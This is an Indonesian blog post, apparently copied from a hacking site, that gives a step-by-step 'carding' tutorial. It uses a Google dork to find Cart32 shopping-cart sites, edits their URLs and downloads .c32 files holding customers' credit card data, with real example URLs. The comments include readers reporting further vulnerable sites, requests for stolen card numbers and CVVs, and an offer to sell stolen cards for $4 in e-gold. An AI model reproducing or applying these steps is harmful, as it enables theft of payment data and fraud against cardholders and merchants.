Tutorial Carding bag 1

 Sabtu 12 Mei 2007

Hola,,

artikel ini saya masukan special request dari seseorang via e-mail yang ngebet bgt minta di carikan artikel tentang CC dan carding. tapi untunglah saya bisa dapet nih artikel sebelum dia mengamuk dengan membanjiri email saya dengan email requestnya GBU🙂

Tutorial Carding (Bagian I)

    

  

————————————–

Tutorial ini spyro dapatkan dari suatu ftp seorang korban saat sedang mendeface webnya (lihat posting berjudul “Mengapa aku mendeface profil FS dan website Fun2Holic” (19 september 2006) di halaman Cerita Hari iNi.

————————————–

1. Cari target dahulu Website Cart32 min v3.5a di google.com, dengan keyword allinurl:/cart32.exe/
2. Ambil salah satu site hasil pencarian, misalnya :

 http://www.wideopen.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound

3. Ganti url tsb diakhir stringnya menjadi http://www.wideopen.net/wrburns_s/cgi-bin/cart32.exe/error <– setelah string /cart32.exe/ ditambah kata error
4. Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
5. Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory
6. Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data cc’s!
7. Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya….
8. Ganti string url tsb. menjadi seperti ini : http://www.wideopen.net/wrburns_s/cgi-bin/cart32/ <– dimana string .exe dihapus/dihilangkan!
9. Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format http://www.contoh.com/cart32/<file.c32&gt;
10. Contoh http://www.wideopen.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32
Ok, semoga berhasil, materi ke-1 Selesai.

            

/* ——————————|EOF|—————————— */

sumber:spyrozone.net

About sugoistanley

Me is just another ordinary boy in this world....Iam not a hacker but i believe someday I Will...

Posted on May 12, 2007, in Hacking. Bookmark the permalink. 10 Comments.

  1. wkkwkwkwk,,,iya gw lah orang nya … thx bgt yah….

  2. susah juga bro… bagian satu nya…
    tapi mendingan yg 1 dari pada 2.. hehe.
    kalo cuma bisa yg 1,,, udah bisa blm y bro?

  3. bro, gw udah dapet dengan url
    http://www.answers4marketing.org/shr-cgi-bin/cart32.exe/error

    tapi .c32 nya banyak tuh,,, terus gmn? gw paste 1 per 1?
    ke url http://www.answers4marketing.org/shr-cgi-bin/cart32.exe/error tapi .exe/error nya di ganti sama format .c32 di url tsb? semuanya? waw….

    gmn y bro? binggung

  4. halo… ku pendatang baru di dalam per-bintanghan hacker….
    sering aku baca di web ini tapi setelah kupraktek in selalu gak bisa, tolong dong kasih aku nomor + cvv nya… ku jg kan mau kebagian duit orang2 kaya diluar negri sana, ku sudah mumet bener nih…
    thanks ….

  5. klo mo minta cc km krm email ksg ke aku ntar aku kasih….
    tp aku g janji cozzz tu cc mungkin dah dipk ma orgnya to orla yg dah dl tw cc itu krn aku dah sebarin ke mana2…kllo mo minta yg msh virgin msh da kok stocknya??? @$4 pmbyrn pk e-gold

  6. bro!!!aku aku bingung tu kan aku dah inject tu web n munculnya ky yg dksh ma bro andy_yan88 tu cara dptin cc n CC holder gmn?? mohon nantuan nya

  7. bro.gua mau gabung ,gua ada basic caridng. mail gua yang minat

  8. wahhhhhhhhhhh tu mah trick kuno….wa dah coba wat jaman ini tapi admin dah pada pinter…gD yang bisa

  9. bro..cc validnya kirim ke email ya..?

  10. Halooo..gw pendatang baru nih!Bro boleh ga gw minta CC yang valid? Gw pengen belanja Hp Nokia N95 di Amazon. Sebenernya gw pengen dikasih tau cara dapatin tuh CC..Gw mohon ilmunya..pless blz lewat email aku bro.Thanks..

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s